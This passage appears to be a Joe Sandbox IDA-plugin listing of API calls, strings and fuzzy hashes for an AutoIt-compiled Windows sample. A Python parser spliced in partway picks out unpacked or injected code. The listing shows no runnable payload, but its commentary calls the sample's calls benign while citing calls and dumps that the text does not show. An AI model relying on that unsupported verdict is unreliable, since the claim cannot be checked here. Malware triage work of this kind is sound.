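• Instruction ID: 66ccf442dadadab89011d4811e061708bb67a13c0fa4f0d3c7426561630c73e2
• Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
• Instruction Fuzzy Hash: 6C41A171D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB90
APIs
• SetTextColor.GDI32(?,00000000), ref: 00CB712F
• GetSysColorBrush.USER32(0000000F), ref: 00CB7160
  • Part of subcall function 00CB73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CB7471
Strings
Memory Dump Source
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
• String ID:
• API String ID: 0-0
• Opcode ID: 03301619bf102c4c31924df29fa0706d223576eb907da8fb87dd865a831e32c8
• Instruction ID: 8eecf0d18269045bfdc80102f2619767fed662bb5b4729de1dc25fbc3dbe7458
• Opcode Fuzzy Hash: 03301619bf102c4c31924df29fa0706d223576eb907da8fb87dd865a831e32c8
• Instruction Fuzzy Hash: 9061787160874997EE349A288D95BBE2398FF41700F201B1EFDA3DB281DB119F46E356
"""

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int                       # call-site address from "ref:"
    subcall: Optional[int] = None  # set for "Part of subcall function X:" lines

@dataclass
class FunctionRecord:
    dump: str = ""
    offset: int = 0
    pe_backed: bool = False
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    @property
    def instruction_fuzzy_hash(self) -> str:
        return self.fields.get("Instruction Fuzzy Hash", "")

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
SRC_RE = re.compile(
    r"^\s*•\s*Source File:\s*(?P<dump>\S+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)\s*$")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")
LINK_SUFFIX = "Download File"

def parse_records(text: str) -> list:
    """Split the listing into records; every record ends at its Instruction Fuzzy Hash line."""
    records, cur, section = [], FunctionRecord(), None
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped:
            continue
        if stripped in SECTIONS:
            section = stripped
            continue
        m = API_RE.match(line)
        if section == "APIs" and m:
            cur.apis.append(ApiCall(m["name"], m["module"], m["args"].split(","),
                                    int(m["ref"], 16), int(m["sub"], 16) if m["sub"] else None))
            continue
        if section == "Strings":
            cur.strings.append(stripped.lstrip("• ").strip())
            continue
        m = SRC_RE.match(line)
        if m:
            cur.dump, cur.offset, cur.pe_backed = m["dump"], int(m["offset"], 16), m["pe"] == "true"
            continue
        m = FIELD_RE.match(line)
        if m:
            key, val = m["key"], m["val"]
            if val.endswith(LINK_SUFFIX):          # strip the rendered link label
                val = val[:-len(LINK_SUFFIX)].strip()
            if key == "Associated":
                cur.fields.setdefault(key, []).append(val)
            else:
                cur.fields[key] = val
            if key == "Instruction Fuzzy Hash":    # last field of every record
                records.append(cur)
                cur, section = FunctionRecord(), None
    return records

def unbacked_functions(records: list) -> list:
    """Records disassembled from memory not mapped from a PE: unpacked or injected code."""
    return [r for r in records if not r.pe_backed]

def api_calls(records: list, include_subcalls: bool = False) -> list:
    """Sorted 'MODULE!Name' set of the calls these functions make."""
    return sorted({f"{c.module}!{c.name}" for r in records for c in r.apis
                   if include_subcalls or c.subcall is None})

def index_by_fuzzy_hash(records: list) -> dict:
    """Instruction fuzzy hash -> records, for matching functions across samples."""
    idx = {}
    for r in records:
        idx.setdefault(r.instruction_fuzzy_hash, []).append(r)
    return idx

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in unbacked_functions(recs):
        print(f"unbacked code at {r.offset:08X}: {r.instruction_fuzzy_hash}")
    print(api_calls(recs, include_subcalls=True))
```

Run against the full listing (copy the text of the page into a file and pass it to `parse_records`), the non-PE-backed records are the ones to carve out of the 03149000 dump and hash; the direct API set and the `API ID` field give a quick read of what each function does (the RaiseException call above passes C000000D, STATUS_INVALID_PARAMETER, which is the CRT's invalid-parameter handler rather than anything malicious, while the GDI/USER32 set in the last block is the AutoIt GUI drawing code).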
                                                                      APIs
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00CB712F
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00CB7160
                                                                      • GetSysColor.USER32(0000000F), ref: 00CB716C
                                                                      • SetBkColor.GDI32(?,000000FF), ref: 00CB7186
                                                                      • SelectObject.GDI32(?,?), ref: 00CB7195
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00CB71C0
                                                                      • GetSysColor.USER32(00000010), ref: 00CB71C8
                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00CB71CF
                                                                      • FrameRect.USER32(?,?,00000000), ref: 00CB71DE
                                                                      • DeleteObject.GDI32(00000000), ref: 00CB71E5
                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00CB7230
                                                                      • FillRect.USER32(?,?,?), ref: 00CB7262
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CB7284
                                                                        • Part of subcall function 00CB73E8: GetSysColor.USER32(00000012), ref: 00CB7421
                                                                        • Part of subcall function 00CB73E8: SetTextColor.GDI32(?,?), ref: 00CB7425
                                                                        • Part of subcall function 00CB73E8: GetSysColorBrush.USER32(0000000F), ref: 00CB743B
                                                                        • Part of subcall function 00CB73E8: GetSysColor.USER32(0000000F), ref: 00CB7446
                                                                        • Part of subcall function 00CB73E8: GetSysColor.USER32(00000011), ref: 00CB7463
                                                                        • Part of subcall function 00CB73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CB7471
                                                                        • Part of subcall function 00CB73E8: SelectObject.GDI32(?,00000000), ref: 00CB7482
                                                                        • Part of subcall function 00CB73E8: SetBkColor.GDI32(?,00000000), ref: 00CB748B
                                                                        • Part of subcall function 00CB73E8: SelectObject.GDI32(?,?), ref: 00CB7498
                                                                        • Part of subcall function 00CB73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00CB74B7
                                                                        • Part of subcall function 00CB73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CB74CE
                                                                        • Part of subcall function 00CB73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00CB74DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                      • String ID:
                                                                      • API String ID: 4124339563-0
                                                                      • Opcode ID: 738ec446cad1faddcd52c1419ba5ab530128018f3274d182d8bc53af154f521f
                                                                      • Instruction ID: 6763ea0928cade1d4b35e73fbc1f2f8eee5abc912f45319c4163a050e82cbac4
                                                                      • Opcode Fuzzy Hash: 738ec446cad1faddcd52c1419ba5ab530128018f3274d182d8bc53af154f521f
                                                                      • Instruction Fuzzy Hash: 50A16272008301EFD7119F64DC88B9F7BA9FB89321F100B19F9A2A61E1D775E944DB62
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,?), ref: 00C38E14
                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00C76AC5
                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C76AFE
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C76F43
                                                                        • Part of subcall function 00C38F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C38BE8,?,00000000,?,?,?,?,00C38BBA,00000000,?), ref: 00C38FC5
                                                                      • SendMessageW.USER32(?,00001053), ref: 00C76F7F
                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C76F96
                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00C76FAC
                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00C76FB7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                      • String ID: 0
                                                                      • API String ID: 2760611726-4108050209
                                                                      • Opcode ID: 867e201817f4a852ab1dc0d27c05360b67177d2885f2c7b502ac153e9a9d5f92
                                                                      • Instruction ID: 07d4e03ee13605e330eba78d62ce2efbef1f9f3ae27dd12be3afaf78d2301f2b
                                                                      • Opcode Fuzzy Hash: 867e201817f4a852ab1dc0d27c05360b67177d2885f2c7b502ac153e9a9d5f92
                                                                      • Instruction Fuzzy Hash: 6F12BB34200A01DFDB25CF24C884BBABBA5FB45300F188569F4A9CB261CB71EE56DF91
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00C94AED
                                                                      • GetDriveTypeW.KERNEL32(?,00CBCB68,?,\\.\,00CBCC08), ref: 00C94BCA
                                                                      • SetErrorMode.KERNEL32(00000000,00CBCB68,?,\\.\,00CBCC08), ref: 00C94D36
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DriveType
                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                      • API String ID: 2907320926-4222207086
                                                                      • Opcode ID: 79836d11964b6b08f033614162e2b7c484cd8e93801a2388472ef121f4b56958
                                                                      • Instruction ID: 0f70e9dbe8b57f45167982328543ebe32d2a04f26e3f4e21c499ace9497b06cd
                                                                      • Opcode Fuzzy Hash: 79836d11964b6b08f033614162e2b7c484cd8e93801a2388472ef121f4b56958
                                                                      • Instruction Fuzzy Hash: 0361D330705246DFCF0CDF26CA8AD6CB7A1EB18384B244465F806AB691DB35EF52EB41
                                                                      APIs
                                                                      • GetSysColor.USER32(00000012), ref: 00CB7421
                                                                      • SetTextColor.GDI32(?,?), ref: 00CB7425
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00CB743B
                                                                      • GetSysColor.USER32(0000000F), ref: 00CB7446
                                                                      • CreateSolidBrush.GDI32(?), ref: 00CB744B
                                                                      • GetSysColor.USER32(00000011), ref: 00CB7463
                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CB7471
                                                                      • SelectObject.GDI32(?,00000000), ref: 00CB7482
                                                                      • SetBkColor.GDI32(?,00000000), ref: 00CB748B
                                                                      • SelectObject.GDI32(?,?), ref: 00CB7498
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00CB74B7
                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CB74CE
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00CB74DB
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CB752A
                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00CB7554
                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00CB7572
                                                                      • DrawFocusRect.USER32(?,?), ref: 00CB757D
                                                                      • GetSysColor.USER32(00000011), ref: 00CB758E
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00CB7596
                                                                      • DrawTextW.USER32(?,00CB70F5,000000FF,?,00000000), ref: 00CB75A8
                                                                      • SelectObject.GDI32(?,?), ref: 00CB75BF
                                                                      • DeleteObject.GDI32(?), ref: 00CB75CA
                                                                      • SelectObject.GDI32(?,?), ref: 00CB75D0
                                                                      • DeleteObject.GDI32(?), ref: 00CB75D5
                                                                      • SetTextColor.GDI32(?,?), ref: 00CB75DB
                                                                      • SetBkColor.GDI32(?,?), ref: 00CB75E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 1996641542-0
                                                                      • Opcode ID: 0078570746cbe37773d0d7f127148b6733761bece5f7f52cdb8f2a953627f28c
                                                                      • Instruction ID: 20cf75c44a81bc563354d02f77af8cf44a48bf81b3cf44fd010bafcb6d0a614f
                                                                      • Opcode Fuzzy Hash: 0078570746cbe37773d0d7f127148b6733761bece5f7f52cdb8f2a953627f28c
                                                                      • Instruction Fuzzy Hash: 55615D72904218AFDB119FA8DC89FEE7FB9EB48320F114215F915BB2A1D7709940DFA0
                                                                      APIs
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C38968
                                                                      • GetSystemMetrics.USER32(00000007), ref: 00C38970
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C3899B
                                                                      • GetSystemMetrics.USER32(00000008), ref: 00C389A3
                                                                      • GetSystemMetrics.USER32(00000004), ref: 00C389C8
                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C389E5
                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C389F5
                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C38A28
                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C38A3C
                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00C38A5A
                                                                      • GetStockObject.GDI32(00000011), ref: 00C38A76
                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C38A81
                                                                        • Part of subcall function 00C3912D: GetCursorPos.USER32(?), ref: 00C39141
                                                                        • Part of subcall function 00C3912D: ScreenToClient.USER32(00000000,?), ref: 00C3915E
                                                                        • Part of subcall function 00C3912D: GetAsyncKeyState.USER32(00000001), ref: 00C39183
                                                                        • Part of subcall function 00C3912D: GetAsyncKeyState.USER32(00000002), ref: 00C3919D
                                                                      • SetTimer.USER32(00000000,00000000,00000028,00C390FC), ref: 00C38AA8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                      • String ID: AutoIt v3 GUI
                                                                      • API String ID: 1458621304-248962490
                                                                      • Opcode ID: 10841a65f2226ee4cc18f32b2bfea308ba97df6006a76398e7bf5118905687f4
                                                                      • Instruction ID: 96c890380553018ba293ea5b77a02b66985bd857c9401373b97ded5ecea6d791
                                                                      • Opcode Fuzzy Hash: 10841a65f2226ee4cc18f32b2bfea308ba97df6006a76398e7bf5118905687f4
                                                                      • Instruction Fuzzy Hash: 7FB18971A00209EFDF14DFA8CC85BAE3BB5FB48314F158229FA15AB2D0DB74A944CB51
                                                                      APIs
                                                                        • Part of subcall function 00C810F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C81114
                                                                        • Part of subcall function 00C810F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C80B9B,?,?,?), ref: 00C81120
                                                                        • Part of subcall function 00C810F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C80B9B,?,?,?), ref: 00C8112F
                                                                        • Part of subcall function 00C810F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C80B9B,?,?,?), ref: 00C81136
                                                                        • Part of subcall function 00C810F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C8114D
                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C80DF5
                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C80E29
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C80E40
                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00C80E7A
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C80E96
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C80EAD
                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C80EB5
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00C80EBC
                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C80EDD
                                                                      • CopySid.ADVAPI32(00000000), ref: 00C80EE4
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C80F13
                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C80F35
                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C80F47
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C80F6E
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C80F75
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C80F7E
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C80F85
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C80F8E
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C80F95
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00C80FA1
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C80FA8
                                                                        • Part of subcall function 00C81193: GetProcessHeap.KERNEL32(00000008,00C80BB1,?,00000000,?,00C80BB1,?), ref: 00C811A1
                                                                        • Part of subcall function 00C81193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C80BB1,?), ref: 00C811A8
                                                                        • Part of subcall function 00C81193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C80BB1,?), ref: 00C811B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                      • String ID:
                                                                      • API String ID: 4175595110-0
                                                                      • Opcode ID: 33729d71279b9992f7cdb0b25b11b038ec60a5e90c2c01c744ee3cf2706b237d
                                                                      • Instruction ID: 30b0b40e70ebefb2fc2b3cde3b141167f637d71775c2f4fe55a144157145661c
                                                                      • Opcode Fuzzy Hash: 33729d71279b9992f7cdb0b25b11b038ec60a5e90c2c01c744ee3cf2706b237d
                                                                      • Instruction Fuzzy Hash: DE715E7190020AABDF60EFA4DC45FAEBBB8BF05344F148215FA69E7191D7319A19CB60
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00CB835A
                                                                      • _wcslen.LIBCMT ref: 00CB836E
                                                                      • _wcslen.LIBCMT ref: 00CB8391
                                                                      • _wcslen.LIBCMT ref: 00CB83B4
                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CB83F2
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00CB5BF2), ref: 00CB844E
                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CB8487
                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00CB84CA
                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CB8501
                                                                      • FreeLibrary.KERNEL32(?), ref: 00CB850D
                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CB851D
                                                                      • DestroyIcon.USER32(?,?,?,?,?,00CB5BF2), ref: 00CB852C
                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CB8549
                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CB8555
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                      • String ID: .dll$.exe$.icl
                                                                      • API String ID: 799131459-1154884017
                                                                      • Opcode ID: 13c11a5c74ad04c4abf3342c7a55b20744ac06309765ec49a6128f53f8976d7d
                                                                      • Instruction ID: 1809a429d07cc3f9acaf789b43c2df1cd825003fdddc45797542a24f98a2990a
                                                                      • Opcode Fuzzy Hash: 13c11a5c74ad04c4abf3342c7a55b20744ac06309765ec49a6128f53f8976d7d
                                                                      • Instruction Fuzzy Hash: 8F61DF71500215BEEB24DF64CC81BFE77ACBB08B11F104609F825E61D1DF74AA88EBA0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                      • API String ID: 0-1645009161
                                                                      • Opcode ID: 96c4de2cbe8411f8b13b05df721637833f52bd56ab28223d2e871cd124eeaf7c
                                                                      • Instruction ID: d3e730c23d3cf22af369daef542dc27fefc4b9cad09b02c0f45d8da9bb49c38b
                                                                      • Opcode Fuzzy Hash: 96c4de2cbe8411f8b13b05df721637833f52bd56ab28223d2e871cd124eeaf7c
                                                                      • Instruction Fuzzy Hash: C8812771A04225BBDF21AF61ECC2FAE37B8BF15700F144124F914AB592EB70DA45D7A1
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?), ref: 00C93EF8
                                                                      • _wcslen.LIBCMT ref: 00C93F03
                                                                      • _wcslen.LIBCMT ref: 00C93F5A
                                                                      • _wcslen.LIBCMT ref: 00C93F98
                                                                      • GetDriveTypeW.KERNEL32(?), ref: 00C93FD6
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C9401E
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C94059
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C94087
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                      • API String ID: 1839972693-4113822522
                                                                      • Opcode ID: f07c2a669653a8cbcf5341ad4a65c8cd267f42082b8bd3cef02de0f3d86c3588
                                                                      • Instruction ID: 82a4bbd308d53944f55ab0f4c7b808855533778403c95d009f174fe97bd5e5f8
                                                                      • Opcode Fuzzy Hash: f07c2a669653a8cbcf5341ad4a65c8cd267f42082b8bd3cef02de0f3d86c3588
                                                                      • Instruction Fuzzy Hash: 9271E1726043119FCB10EF24C88596EB7F4EFA8754F10492DF8A597261EB30EE46DB91
                                                                      APIs
                                                                      • LoadIconW.USER32(00000063), ref: 00C85A2E
